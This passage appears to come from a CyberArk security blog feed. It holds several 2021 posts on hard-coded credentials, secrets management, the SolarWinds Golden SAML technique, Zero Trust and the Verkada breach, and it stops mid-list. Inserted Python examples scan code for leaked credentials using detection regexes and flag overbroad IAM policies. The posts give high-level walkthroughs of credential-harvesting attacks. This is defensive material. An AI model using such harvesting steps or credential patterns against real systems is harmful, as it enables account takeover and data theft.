Since software updates are designed to reduce security risks, one of the best ways to keep devices secure is to keep them up to date. These updates, which require nothing more than accepting when prompted, are so effective at keeping devices safe that Murphy says he’s seen attackers initiate updates themselves. He explains that they often do so in order to prevent others from attacking the same network once they’ve gained access.

“When they find the flaw they’ll secure the system so only they have access to the flaw,” he says. “They’ll go through your network devices — like your home router, where many people have default passwords — and if the firmware is out of date, they remote back in and patch it up to the proper level so nobody else can hack it.”

So, don’t be like Billy — keep your software, browsers and operating system up to date.

Small Steps to Mitigate Big Risks

While it’s impossible to remain entirely secure, there are a lot of small steps individual remote workers can take to reduce the risks in this new working environment. “There’s a million other things you can do — but with anything, if we give you too much or it’s too complicated, you’re probably not going to do anything at all,” Murphy says. “Focusing on least privilege, implementing multi-factor authentication and separating work and personal devices, at a minimum, is a really good start.”

Hard-Coded Credentials: The Not-So-Secret Secret Putting Your Cloud at Risk
https://www.cyberark.com/blog/hard-coded-credentials-the-not-so-secret-secret-putting-your-cloud-at-risk/
Tue, 06 Apr 2021 13:00:34 +0000

If you’ve never celebrated the Epiphany (or Mardi Gras in Louisiana), you have likely missed out on the tradition of the King Cake. It’s a coffee cake-type pastry with a small figurine baked inside that represents good fortune to the one who finds it in their slice.

Think of an organization’s most valuable assets as the figurine baked into a modern IT infrastructure. To do their jobs, hundreds or even thousands of remote workers, customers, vendors, devices, and applications have to bite into this “cake” regularly. While they’re (usually) not after the prize for themselves, they’ve opened up holes to the coveted figurine. And unfortunately, the “winner” is often a cyber criminal who has gotten inside the cake and chewed their way to the cake’s center where the prize awaits.

Today, there’s a good chance an attacker has already taken a bite of the cake. So the question is, how do you keep the coveted trophy away from undeserving fortune seekers?

This is the second piece in a three-part series on real-world cloud attacks, illustrating how cyber criminals and malicious insiders often compromise vulnerable cloud identities and manipulate privileged access to reach into cloud infrastructure and services, and inflict costly, damaging attacks. By adopting an attacker’s mindset, organizations can take a more proactive stance and start turning the tables.

Are Your Hard-Coded Credentials Ripe for Hijacking?

The code and scripts developers write often need credentials and secrets, such as SSH keys and API tokens, to access cloud resources and interact with other apps and tools. To save time, developers often embed these secrets into code. In fact, “hard coding” is a risky habit that’s been around as long as developers have. The problem is these hard-coded credentials (also called embedded credentials) are exposed to everyone else with access to the code.

As more and more organizations build and operate applications using cloud-native architecture, the risk of hard-coded credential compromise can increase. That’s because agile development settings typically exchange a lot of code with cloud-based repositories like GitHub. Each exchange can inadvertently expose credentials, including hard-coded credentials, to potential attackers, and sometimes, the entire public. North Carolina State University researchers found that over 100,000 of GitHub’s code repositories contained exposed credentials – and that was after scanning only 13% of the service’s total public repositories.

By taking just one leaked cloud credential from one identity, an attacker can gain entry to an organization’s environment, escalate privileges and potentially gain privileged access to highly sensitive cloud resources.

Step by step, here’s what a real-world cloud attack that hijacks hard-coded or embedded credentials might look like:

Cloud Attack That Hijacks Hard-Coded or Embedded Credentials

1. Gaining a foothold. A routine code exchange with GitHub contains embedded credentials. Using simple, publicly available harvesting tools, an attacker trawls the code for strings that match the characteristics of cloud credentials, obtains access keys, and uses them to secure an initial foothold in the organization.

2. Escalating privilege. The attacker uses the stolen credential to escalate privileges, and with heightened access, begins to move freely with full access to a cloud database.

3. Gaining access. The attacker just hit the jackpot! That cloud database contained sensitive data on millions of customers and employees, which is stolen and leveraged for ransom.

4. The result. The organization pays tens of thousands of dollars in ransom to the attacker, as well as a hefty $1 million in regulatory fees.

Have Your Cake and Eat it Too

By removing hard-coded credentials and secrets in code, PaaS configurations, application development tools (such as orchestration platforms), and internally developed applications, following privileged access management best practices, and implementing strongly authenticated secret delivery mechanisms, organizations will be better equipped to keep their cloud secrets, secret.

Review the scenario above and start thinking about how an attacker might be able to exploit vulnerabilities in your environment. Then take action by digging deeper into foundational risk mitigation and secrets management strategies so you can bolster defenses and embrace the cloud with confidence.
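The harvesting step in the scenario above works because credential formats are recognisable, and that same recognisability lets a defender gate commits before they reach a repository. The following is an added example, not CyberArk's code: a small scanner for the hard-coded pattern, with the remediated runtime-lookup pattern beside it. The regexes, entropy threshold and sample snippets are this example's own assumptions; the key values are the placeholder examples from AWS's documentation, not live credentials.

```python
"""Scan source text for hard-coded cloud credentials, and show the
remediated pattern (fetch the secret at runtime instead of embedding it).

Added example, not CyberArk's code. The regexes, entropy threshold and the
sample snippets are this example's own assumptions; the key values are the
placeholder examples from AWS's documentation, not live credentials.
"""
import math
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The AWS access key ID format (AKIA + 16 characters) is documented by AWS;
# the other two patterns are heuristics typical of secret scanners.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    # name = "value" or name: 'value', where the name looks secret-bearing
    "secret_assignment": re.compile(
        r"""(?ix)
        \b(?:aws_secret_access_key|secret(?:_key)?|api[_-]?key|password|passwd|token)
        \s*[:=]\s*["']([^"'\s]{8,})["']"""),
}


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line number within the scanned text
    kind: str      # which pattern matched
    snippet: str   # the offending line with the secret value masked


def shannon_entropy(value: str) -> float:
    """Bits per character; random keys score high, dictionary words low."""
    if not value:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def mask(value: str) -> str:
    """Keep a four-character prefix so a reviewer can locate the value
    without the scanner's own output leaking the secret."""
    return value[:4] + "*" * max(0, len(value) - 4)


def scan_source(text: str, min_entropy: float = 3.0) -> List[Finding]:
    """Return one Finding per (line, pattern) that looks like an embedded
    credential. Usable as a pre-commit or CI gate: fail the job on any hit."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            match = pattern.search(line)
            if not match:
                continue
            secret = match.group(1) if kind == "secret_assignment" else match.group(0)
            # Placeholders such as "changeme" are low-entropy; skipping them
            # keeps the gate from crying wolf on obviously fake values.
            if kind == "secret_assignment" and shannon_entropy(secret) < min_entropy:
                continue
            findings.append(Finding(line_no, kind, line.replace(secret, mask(secret)).strip()))
    return findings


def load_credential(name: str, env: Optional[Dict[str, str]] = None) -> str:
    """The remediated pattern: resolve the secret at runtime from the process
    environment (a stand-in for a secrets-manager lookup). Fails closed: a
    missing or empty secret is an error, never a silent fallback."""
    source = os.environ if env is None else env
    value = source.get(name, "")
    if not value:
        raise RuntimeError(f"secret {name!r} was not provided; refusing to start")
    return value


# Constructed sample of the risky pattern (AWS documentation placeholder keys).
VULNERABLE_SNIPPET = '''
import boto3
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
client = boto3.client("s3", aws_access_key_id=AWS_ACCESS_KEY_ID,
                      aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
'''

# The same snippet after remediation: nothing sensitive is committed.
REMEDIATED_SNIPPET = '''
import os
import boto3
client = boto3.client("s3",
                      aws_access_key_id=os.environ["AWS_ACCESS_KEY_ID"],
                      aws_secret_access_key=os.environ["AWS_SECRET_ACCESS_KEY"])
'''

if __name__ == "__main__":
    for f in scan_source(VULNERABLE_SNIPPET):
        print(f"line {f.line_no}: {f.kind}: {f.snippet}")
    print("remediated snippet findings:", len(scan_source(REMEDIATED_SNIPPET)))
```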

Next up, we will examine one of the most highly coveted cloud targets – the cloud console – and why so many organizations don’t even know it’s exposed.

Applications Are Everything and Everywhere – Does Whack-a-Mole Security Work?
https://www.cyberark.com/blog/applications-are-everything-and-everywhere-does-whack-a-mole-security-work/
Fri, 02 Apr 2021 13:00:09 +0000

The SolarWinds digital supply chain attack began by compromising the “heart” of the CI/CD pipeline and successfully changing application code. It highlighted the major challenges organizations face in securing their applications across the software development lifecycle and is driving increased attention at the highest levels of enterprise and government. In fact, Reuters recently reported that the Biden administration is preparing an executive order outlining new software security and breach disclosure requirements.

As organizations look to strengthen their digital supply chain and protect the applications they develop and use, many are focusing on application secrets – which are ripe targets for attackers and can provide unrestricted privileged access to sensitive systems.

Cloud-Native Apps Expand Security Needs

Today, many organizations are taking a cloud-native approach to building, testing, and deploying new applications – whether front- or back-office, consumer-facing, web or mobile. And by embracing DevOps methodologies and automation, they’re quickly moving along the digital maturity curve.

As applications are increasingly built using microservices and run in dynamic, short-lived containerized environments, everything needs to interact with each other – sharing secrets and credentials to securely access resources. The result: a lot more secrets that need to be secured.

What’s more, the powerful DevOps and automation tools developers use to build applications, such as Jenkins and Ansible, store massive amounts of credentials and secrets within them. This allows the projects, playbooks, and scripts managed by these mission-critical “Tier 0” assets to access other tools, services, and platforms. All of these tools also require high levels of privilege.

Whack-a-Mole Security: So Many Applications, So Little Time, No Standard Approach

But, of course, it’s more than just cloud-native apps. Most enterprises have many different application types in their portfolio: some legacy apps, newer apps written using .NET, for example, and even mainframe applications.

It’s becoming clear that building a strong modern IT infrastructure hinges on an organization’s ability to secure all application types – from the back-office mainframe running high volume transactions on z/OS, to Kubernetes apps running across multiple cloud regions – at the speed of business, and at scale.

Yet that’s easier said than done. Today’s developer culture emphasizes high velocity, intensive sharing of code, ad-hoc tooling, and full-on automation – all of which can introduce new vulnerabilities such as exposed secrets and code injection. Meanwhile, threat actors are growing in sophistication and precision, targeting applications and development environments and zeroing in on unprotected credentials and secrets with increasing ease to hijack IT resources or steal data or code. Even the most secure RPA workflows and DevOps pipelines have tiny cracks if you know how to find them.

So how can time- and resource-constrained security teams possibly find and secure all of these applications and secrets – let alone protect new ones being created each day in these dynamic environments?

Many end up taking a piecemeal approach, securing secrets in one platform or tool with one secrets management solution, while using a different method to secure secrets in another area. Without a standardized approach to secrets management, teams are left juggling many different moving pieces. The old game of whack-a-mole comes to mind: as soon as one issue is resolved, another one pops up.

Secure All Application Types with CyberArk

At CyberArk, we’ve long been committed to helping organizations secure the broadest range of applications across the broadest range of environments with our privileged access management (PAM) solutions. As our customers move along the digital maturation curve, many are shifting to our PAM-as-a-service offering, CyberArk Privilege Cloud.

In Q1 2021, we introduced a new integration between CyberArk Privilege Cloud and CyberArk Conjur Secrets Manager Enterprise, providing our SaaS customers with a centralized way to secure cloud-native, containerized apps and DevOps environments. This follows our integration with CyberArk Credential Providers, further expanding support across many application types.

Now organizations can centrally secure, manage and audit privileged credentials and secrets used by non-human identities anywhere – including cloud-native applications, CI/CD and DevOps tools, internally developed applications, commercial-off-the-shelf (COTS) apps, RPA software bots and automation platforms – whether they’re running PAM as-a-service or on premises.

With CyberArk, mission-critical applications running at scale can securely access high-value resources, including databases and IT infrastructure. Our flexible SaaS model makes deployment faster and easier, reduces operational complexity, and drives business agility – all while shrinking the attack surface.

The Right Place to Start

Putting a plan in place to secure the ever-expanding number and types of applications across your organization can feel daunting – but it doesn’t have to. Take advantage of tools that help you prioritize and focus on your most important unsecured apps first, achieve “quick wins” in reducing risk, and accelerate your efforts by being more strategic.

Stop playing whack-a-mole. Get consistent about secrets management to keep your applications safe and prevent them from exposing the enterprise to unnecessary vulnerabilities. Get a personalized demo to learn more.

Revelations About Securing Hybrid Cloud Environments Post-SolarWinds
https://www.cyberark.com/blog/revelations-about-securing-hybrid-cloud-environments-post-solarwinds/
Wed, 31 Mar 2021 13:00:37 +0000

In the early 1960s, J.C.R. Licklider, director of the Pentagon’s Information Processing Techniques Office (IPTO), spoke of a future “intergalactic computer network” that would serve as the “main and essential medium of informational interaction for governments, institutions, corporations, and individuals.”

Today, Licklider’s vision is very much reality. Cloud services and technologies are ubiquitous, enabling organizations of all sizes and across all sectors to connect, collaborate and push the boundaries of innovation. Yet those who wish to do harm are also making strides. Malicious actors understand four things:

  • That cloud misconfigurations are rampant.
  • Even “ordinary” user identities in the cloud can be configured with as much power as traditional privileged admin accounts.
  • They can use familiar methods from on-premises attacks (like privilege escalation and lateral movement) while covering more ground in less time by taking the cloud route.
  • When a cloud identity is overpermissioned (which happens all the time), they can often use it to move around without detection.

The Digital Supply Chain Attack That Reached Into the Cloud and Around the World

The massive SolarWinds breach illustrates this increased focus on the cloud — particularly the privilege escalation stage of a multi-step digital supply chain attack, after the attacker had successfully infiltrated a SolarWinds Orion customer. Here’s a look:

Orion software requires privileged access to run, whether it is installed on physical servers on-premises or on virtual machines in the cloud. When the SUNBURST malware reached a victim organization via software update, it reportedly already had elevated privileged access, making it easier for the attacker to establish a foothold in the Orion software. And by doing so, the attacker may have been able to extract privileged API keys, allowing them to “own” the organization’s cloud right away.

In some instances, the attacker used the sophisticated “Golden SAML” attack technique, leveraging their privileged access to target the popular SAML authentication standard, which is used to establish trust between on-premises and cloud environments. The adversary gained admin access to the victim’s Active Directory Federation Services (ADFS) server, stole the primary secret of this identity provider, and then used it to forge SAML tokens and bypass MFA completely. With unfettered privileged access to nearly any of an organization’s systems and applications, the attacker could impersonate virtually any identity and move laterally between cloud and on-premises systems with ease.

Apples-to-Oranges: The Hybrid Cloud Security Conundrum

Nearly every organization uses cloud services, and 80% have taken a hybrid cloud approach — keeping some infrastructure on-premises and moving other functions and services to the cloud, according to a 2021 Flexera survey. These workloads are often spread across multiple public cloud platforms for myriad reasons: business flexibility, specific business line needs, prior acquisitions, geographic coverage and more. In fact, a recent Cloud Security Alliance study found 81% of organizations have a multi-cloud strategy in place, while the same Flexera report estimates organizations use or experiment with an average of 3.7 public cloud providers.

Securing the operations of hybrid cloud environments is uniquely challenging. These diversified, yet highly interconnected environments introduce new types of threats and expanded attack surfaces that make security teams’ jobs a lot more difficult. Since traditional security approaches don’t always translate in cloud environments, there’s a lot of new information and technology to learn but rarely enough time or resources. Add in the complexity of DevOps tools, automation, countless SaaS apps and shadow IT, and it’s easy to see why security teams are overwhelmed.

As more organizations “assume breach” and focus on ways to proactively identify and respond to in-progress attacks, security teams are looking for more consistent ways to secure high-value data and assets, no matter where they reside. The most effective follow these best practices:

1. Get a Full View of Identity. Since nearly every targeted cyberattack today involves the compromise of identity and abuse of privileged credentials, most teams begin by taking inventory of their privileged and identity landscape. They then establish a single, centralized way to visualize and manage credentials such as passwords, access keys and API keys across their hybrid cloud environment.

2. Follow Security Best Practices Outlined by Your Federated Identity Provider. In the case of SolarWinds, attackers abused trust in federated authentication environments to access critical assets and data. It is crucial to revisit and follow the security best practices outlined by your federated identity provider to reduce risk of abuse in these powerful mechanisms. For example, Microsoft offers a comprehensive guide for secure planning and deployment of Active Directory Federation Services and Web Application Proxy. For additional guidance on Golden SAML detection and mitigation activities, read this piece by CyberArk Labs and the NSA advisory.

3. Reevaluate “High-Value” Assets. When securing access to high-value, high-risk assets, such as Active Directory and domain controllers, cloud management consoles and portals sometimes get overlooked. But if compromised, an attacker can gain full control of an organization’s cloud services and resources. Root-level user accounts (or “break glass accounts”) should be vaulted and rotated as any other privileged credentials. Federate access to these consoles, along with virtual machines and CLIs, and authenticate with your preferred identity provider.

Enforcing strong PAM controls, such as securing and rotating AWS root accounts protected with MFA, will help to reduce exposure, while continuously managing privileged sessions can help security teams spot potential issues earlier and make it harder for attackers to maintain persistence. After the highest value targets are secured, teams can expand coverage to other areas.

4. Be Consistent About Least Privilege and Enforce it Everywhere. Many security-minded organizations are shifting to Zero Trust security frameworks that employ the principle of least privilege to block privilege escalation and lateral movement. Many are using frameworks such as the MITRE ATT&CK and Cloud Security Alliance’s Cloud Control Matrix to guide them. Least privilege approaches limit the number of users with admin privileges and replace standing access with just-in-time privileged access. In cloud environments, this also entails conducting regular entitlement reviews to identify unused or misconfigured IAM permissions that pose heightened risk. AI-powered solutions and integrations can help automate identification and remediation of excessive cloud permissions.

5. Secure Human Access with Adaptive MFA and SSO. Identity as a Service (IDaaS) capabilities that can strongly authenticate human identities are integral to a defense-in-depth security approach — no matter the environment. To minimize end-user friction, consider solutions that integrate with major cloud providers’ native capabilities — AWS Single Sign-On, for example — to enable automatic provisioning of users/groups and simplify access to authorized accounts and resources. It’s critically important to layer IDaaS protections with strong PAM controls to reduce the risk of stealthy bypass techniques like Golden SAML.
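As an added illustration of the entitlement review in point 4 (example code, not CyberArk's), the helper below walks an IAM policy document and flags the grants such a review would question: wildcard actions and resources, Allow combined with NotAction/NotResource, and identity-administration actions carrying no Condition. Both sample policies are constructed, and the severity ranking is this example's own; the action and condition-key names are real IAM identifiers.

```python
"""Entitlement-review helper: flag IAM policy statements that grant more
than least privilege. Added example, not CyberArk's code; the policy
documents are constructed and the severity rules are this example's own.
"""
import fnmatch
import json
from dataclasses import dataclass
from typing import Any, Dict, List

# Identity-administration actions that warrant a Condition scoping their use
# (real IAM action names; the list is illustrative, not exhaustive).
SENSITIVE_ACTIONS = (
    "iam:passrole",
    "iam:createaccesskey",
    "iam:attachrolepolicy",
    "iam:putuserpolicy",
    "sts:assumerole",
)


@dataclass(frozen=True)
class Finding:
    sid: str        # statement id, or its index when no Sid is set
    severity: str   # critical / high / medium
    issue: str


def _as_list(value: Any) -> List[Any]:
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def review_policy(policy_json: str) -> List[Finding]:
    """Walk every Allow statement and report grants broader than a scoped,
    conditioned least-privilege grant would be."""
    policy = json.loads(policy_json)
    findings: List[Finding] = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access; nothing to flag
        sid = stmt.get("Sid") or f"Statement[{idx}]"
        # IAM matches action names case-insensitively, so compare lower-case.
        actions = [a.lower() for a in _as_list(stmt.get("Action"))]
        resources = _as_list(stmt.get("Resource"))

        def report(severity: str, issue: str, sid: str = sid) -> None:
            findings.append(Finding(sid, severity, issue))

        if "NotAction" in stmt:
            report("high", "Allow with NotAction permits every action except those listed")
        if "NotResource" in stmt:
            report("high", "Allow with NotResource applies to every resource except those listed")
        if "*" in actions and "*" in resources:
            report("critical", "Action '*' on Resource '*' is full administrative access")
        else:
            if "*" in actions:
                report("high", "Action '*' grants every API call")
            if "*" in resources:
                report("medium", "Resource '*' is not scoped to specific ARNs")
        for action in actions:
            if action != "*" and action.endswith(":*"):
                report("medium", f"{action} grants every action in the {action[:-2]} service")
        # A sensitive action with no Condition is a standing, unscoped grant.
        if "*" not in actions and not stmt.get("Condition"):
            for sensitive in SENSITIVE_ACTIONS:
                if any(fnmatch.fnmatchcase(sensitive, pattern) for pattern in actions):
                    report("high", f"{sensitive} is allowed without a Condition limiting its use")
    return findings


def severity_counts(findings: List[Finding]) -> Dict[str, int]:
    """Roll findings up by severity for a review dashboard or CI threshold."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed policy documents (account id is the AWS documentation placeholder).
OVERLY_BROAD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AdminAll", "Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Sid": "S3Everything", "Effect": "Allow", "Action": ["s3:*"],
         "Resource": "arn:aws:s3:::reports-bucket/*"},
        {"Sid": "RoleJuggling", "Effect": "Allow", "Action": ["iam:PassRole"], "Resource": "*"},
        {"Sid": "DenyDelete", "Effect": "Deny", "Action": "s3:DeleteBucket", "Resource": "*"},
    ],
})

LEAST_PRIVILEGE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReadReports", "Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::reports-bucket", "arn:aws:s3:::reports-bucket/*"]},
        {"Sid": "PassOnlyTheAppRole", "Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/app-runner",
         "Condition": {"StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}}},
    ],
})

if __name__ == "__main__":
    for f in review_policy(OVERLY_BROAD_POLICY):
        print(f"[{f.severity}] {f.sid}: {f.issue}")
    print("least-privilege policy findings:", severity_counts(review_policy(LEAST_PRIVILEGE_POLICY)))
```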

Consistency to Reduce Dangerous Cloud Security Cracks 

Once a far-off “intergalactic computer network” dream, the cloud now powers our world and repositions the security perimeter around individual identities.

The SolarWinds attack reminds us that attackers are innovating in lockstep with defenders and turning to the cloud as a force multiplier. Staying ahead will require organizations to adopt an attacker mindset and find ways to make cyber criminals’ jobs as difficult as possible. This means limiting their movements and spotting signs of attack before compromised identities can become privileged and open paths to sensitive assets. A consistent approach to Identity Security rooted in privileged access management can help organizations maintain the visibility and control they need to defend their organizations.

New CISO View Insights on Zero Trust
https://www.cyberark.com/blog/new-ciso-view-insights-on-zero-trust/
Thu, 25 Mar 2021 13:00:34 +0000

Credential theft is on the rise, yet attackers are shifting their collective focus to non-traditional user populations that may not be adequately protected. That’s according to the “The CISO View 2021 Survey: Zero Trust and Privileged Access,” released today by CyberArk.

Here’s a look at some of the key findings:

CISO View on Zero Trust

As organizations move assets to the cloud, increase third-party access to corporate resources and enable sustained remote work models, new identities are multiplying across the enterprise. Any identity – whether customer, remote worker, third-party vendor, device or application – can become privileged at any moment, depending on what they’re accessing or doing.

This new survey demonstrates consensus around the value of Zero Trust – an approach that “never trusts and always verifies.” And in the wake of the massive SolarWinds attack, it highlights a growing sense of urgency for protecting privileged credentials and breaking the attack chain to organizations’ most valuable assets.

The survey is a companion to “The CISO View: Protecting Privileged Access in a Zero Trust Model,” which is based on in-depth interviews with a panel of 12 top security executives from Global 1000 companies.

Read the survey and report, and watch an overview video here.

CISA and NSA: The Times, They Are A-Changin’. Identity is Everything Now
https://www.cyberark.com/blog/cisa-and-nsa-the-times-they-are-a-changin-identity-is-everything-now/
Tue, 23 Mar 2021 13:00:28 +0000

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack, which acting director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Brandon Wales called “the most complex and challenging hacking incident the agency has come up against.” As impacted agencies and private enterprises work to pick up the pieces, there’s debate over the best ways to tackle systemic weaknesses and improve cyber intelligence sharing across the board. But one thing everyone can agree on is that traditional security approaches – which have failed to change with the digital times – are in dire need of an overhaul.

CISA: “Identity Has Become the Boundary”

The SolarWinds breach, along with nearly every major cyber attack today, involved the compromise of identity and subsequent manipulation of privileged access. While presenting forensic analysis of the attack at NIST’s most recent Information Security and Privacy Advisory Board meeting, CISA technical strategist Jay Gazlay put it bluntly: “Identity is everything now.”

While Gazlay acknowledged that very few could pull off such a highly sophisticated digital supply chain attack without being detected, his message was clear: traditional, perimeter-centric security won’t cut it. “We can talk about our network defenses. We can talk about the importance of firewalls and network segmentation. But really, identity has become the boundary, and we need to start readdressing our infrastructures in that matter,” he said, according to Federal News Network’s report on the briefing.

Of course, SolarWinds is far from the first major attack to prompt action. But Gazlay warned that attackers are constantly innovating and that protections many agencies put in place after the 2015 Office of Personnel Management breach are likely inadequate today since so many resources have shifted to the cloud.

“They’re going after the identities that give them access to all the data holdings – much broader campaigns,” he said, according to Federal News Network. “That makes trust store and identity management compromises much more impactful, and frankly, a much higher target. As we move into a cloud infrastructure where all that matters is the expectation that you are who you say you are, to get access to cloud infrastructures, this becomes even more pernicious.”

NSA: You Better Start Swimmin’ Toward Zero Trust, Or Sink Like a Stone

This focus on identity is accelerating the shift toward Zero Trust, a “never trust, always verify” approach that includes authenticating and authorizing every identity – human or non-human – before granting access. While the concept isn’t new, it’s safe to say Zero Trust is going mainstream as hybrid and multi-cloud environments become the norm.

The U.S. National Security Agency (NSA) recently released guidance for embracing a Zero Trust approach, noting these “principles can better position [cybersecurity professionals] to secure sensitive data, systems, and services.”

As we focus on helping agencies and enterprises secure identities throughout the cycle of accessing critical assets, these recommendations resonated strongly with our CyberArk team. Here’s a look at our top takeaways from the NSA’s Zero Trust directive:

Outsider, Insider – It Doesn’t Matter. Always Assume Breach

NSA authors write, “Contemporary threat actors, from cyber criminals to nation-state actors, have become more persistent, more stealthy, and more subtle; thus, they demonstrate an ability to penetrate network perimeter defenses with regularity.” They urge agencies and organizations to “consciously operate and defend resources with the assumption that an adversary already has presence within the environment.”

In the public sector, we’ve seen the great lengths to which legitimate, authorized users will go to exfiltrate information and accomplish ill-intentioned objectives. An assume breach mindset does not discriminate between outsiders or insiders – instead, every identity and access request is presumed malicious until proven otherwise. And the question shifts from “Have I been breached?” to “Do I have the right alarm systems and motion-sensing lights in place to detect and respond before it’s too late?”

Least Privilege Is Foundational to Zero Trust

Motives vary. Adversaries might try to establish persistence in the environment and hide their activity; the SolarWinds attacker used the sophisticated Golden SAML technique to do this successfully. Or, attackers might aim straight for the domain controller or cloud console in search of sensitive data to steal or hold for ransom, or to cause disruption by shutting down critical systems or deleting files. No matter what they’re after, attackers usually follow the same steps: acquire credentials for an identity, move laterally and vertically to escalate privileges, then use this privileged access to compromise sensitive data and assets.

The most effective way to break this chain and shrink the overall attack surface is to enforce least privilege security controls across all identities, devices, and apps – from the endpoint to the cloud. NSA authors write that “data-centric Zero Trust models allow the concept of least privileged access to be applied for every access decision, where the answers to the questions of who, what, when, where, and how are critical for appropriately allowing or denying access to resources.”

When It Comes to Zero Trust, 1+1=3

There’s no cybersecurity silver bullet, and likewise, Zero Trust cannot be achieved with one vendor or solution – it’s not about a specific technology, it’s an approach and a mindset. Instead, it requires a holistic, layered approach that “integrates disparate but related cybersecurity capabilities into a cohesive engine for cybersecurity decision-making,” write NSA authors.

By placing Privileged Access Management at the core of this defense-in-depth strategy, defenders can not only protect against the leading cause of breaches but also minimize an attack’s impact. Consider this scenario: an attacker compromises an agency’s vulnerability management platform, runs an authenticated scan and pinpoints every vulnerable and misconfigured identity within the hybrid cloud environment – essentially scoring a step-by-step playbook for the attack. By protecting these powerful tools with Privileged Access Management controls, such as vaulting and rotating privileged credentials and monitoring sessions to detect risky activity, agencies can dramatically limit exposure and keep that playbook out of reach.

It’s Okay to Start Small. But the Time to Start Is Now.

Conceptually, Zero Trust makes perfect sense. But NSA authors warn that putting it into practice will take time, and they encourage a phased, risk-based approach. “Incorporating Zero Trust functionality incrementally as part of a strategic plan can reduce risk accordingly at each step,” they write. Among the NSA’s key Zero Trust design recommendations is to architect from the inside out: first protect critical data and assets, such as Tier 0 systems, then secure all paths used to access them.

The Identity Defined Security Alliance framework can help with scoping and tiering the various technology components that will require protection at the identity level.

The Battle Outside Ragin’ Will Soon Shake Your Windows… For the Times They Are A-Changin’

In SolarWinds’ shadow, many agencies are feeling pressure to address their greatest identity-related vulnerabilities quickly. This NSA directive offers valuable prioritization guidance for achieving “quick wins” to drive down risk, while laying the groundwork for a phased Zero Trust implementation strategy.

In the famous words of Bob Dylan, “The times, they are a-changin’.” Drive resilience in this new threat landscape by embracing a Zero Trust model. And trust CyberArk to help along the way. As the recognized leader in protecting privileged access, with multiple Department of Defense customers and 130+ installations across the U.S. federal government, we’re uniquely positioned to help agencies meet today’s security and compliance requirements.

]]>
Different IoT Breach, Same (In)Security Story, Broader Consequences https://www.cyberark.com/blog/different-iot-breach-same-insecurity-story-broader-consequences/ Fri, 19 Mar 2021 14:09:48 +0000 https://www.cyberark.com/?p=114823 Verkada IoT Security Breach

“I always feel like somebody’s watching me… Tell me is it just a dream?”

It may have been a dream in 1984 when “Somebody’s Watching Me” topped the charts, but today it’s real life: somebody is almost always watching. Security cameras live on street corners and traffic lights, in prisons, schools, hospitals, and gyms, around our homes, and in our workplaces. Like it or not, video surveillance is a huge part of how society protects its people and assets in 2021.

Many of these cameras are cloud-based and connected to company IT networks and infrastructure – sometimes even the same systems that store data and run applications. These cameras, together with billions of other “smart” devices that can connect with and “talk” to each other, make up the Internet of Things (IoT).

But what happens when these interconnected devices are not secured like other sensitive network assets? Last week, the world got a glimpse when attackers successfully breached video security startup Verkada. According to reports, the attackers gained access to live feeds of about 150,000 IoT-enabled surveillance cameras – positioned over hospital ICU beds, within correctional facilities, in classrooms, and more – and exposed sensitive footage belonging to a number of the software company’s customers.

Attackers Scale Impact by Following a Familiar Path

In this latest IoT breach, it seems the attackers followed a familiar path – one we’ve seen far too often. They reportedly targeted credentials, locating a username and password for a Verkada admin account exposed on the internet. With this, they were able to move freely throughout the network as if they were a support team member performing bulk maintenance operations on cameras. It was later confirmed that more than 100 people within the organization had “super admin” access to this powerful account, each of whom could access thousands of customer cameras.

In a public statement, the company wrote, “In gaining access to the server, the attackers obtained credentials that allowed them to bypass our authorization system, including two-factor authentication.”

Additionally, by gaining root access to the cameras, the attackers could potentially use them to execute their own malicious code, Bloomberg reported. And in some cases, this privileged access could allow them “to pivot and obtain access to the broader corporate network of Verkada’s customers, or hijack the cameras and use them as a platform to launch future hacks.”

The Great IoT Security Debate

There is much discussion on how to tackle the IoT security challenge, with responsibility at the crux of the debate. Is it the manufacturer that must design and build secure devices from the start? Or is it the customer’s responsibility to strengthen protections – from individuals changing default passwords on devices in their homes to enterprises removing hard-coded passwords and beefing up endpoint security for network-connected IoT devices? There’s an industry-wide push for more standards and guidelines to help clarify these big questions, and most agree there’s much work to be done before we have a clear path forward.

The good news is that consensus is growing that IoT devices – especially those used by enterprises and government agencies – must be treated with the same attention and gravity as traditional IT systems. The bipartisan IoT Cybersecurity Improvement Act marked a major milestone in this push. But attackers aren’t waiting around. On the contrary, they’re growing in confidence and precision and increasingly targeting the digital supply chain to scale their impact, as demonstrated in both the recent Verkada and SolarWinds breaches.

IoT represents a potentially massive attack surface, and no matter how strong an organization’s in-house security practices may be, attackers can sometimes circumvent them. For example, IoT devices often receive firmware updates over the air; if the device does not verify the update’s signature and origin, that update channel becomes an easy path to compromise.

It’s Time to Get Smart About Smart Devices

Smart IoT devices simultaneously represent some of the greatest innovations and the greatest challenges for the modern workplace. Here are a few ways your digital business can get smarter (and more secure) while using them:

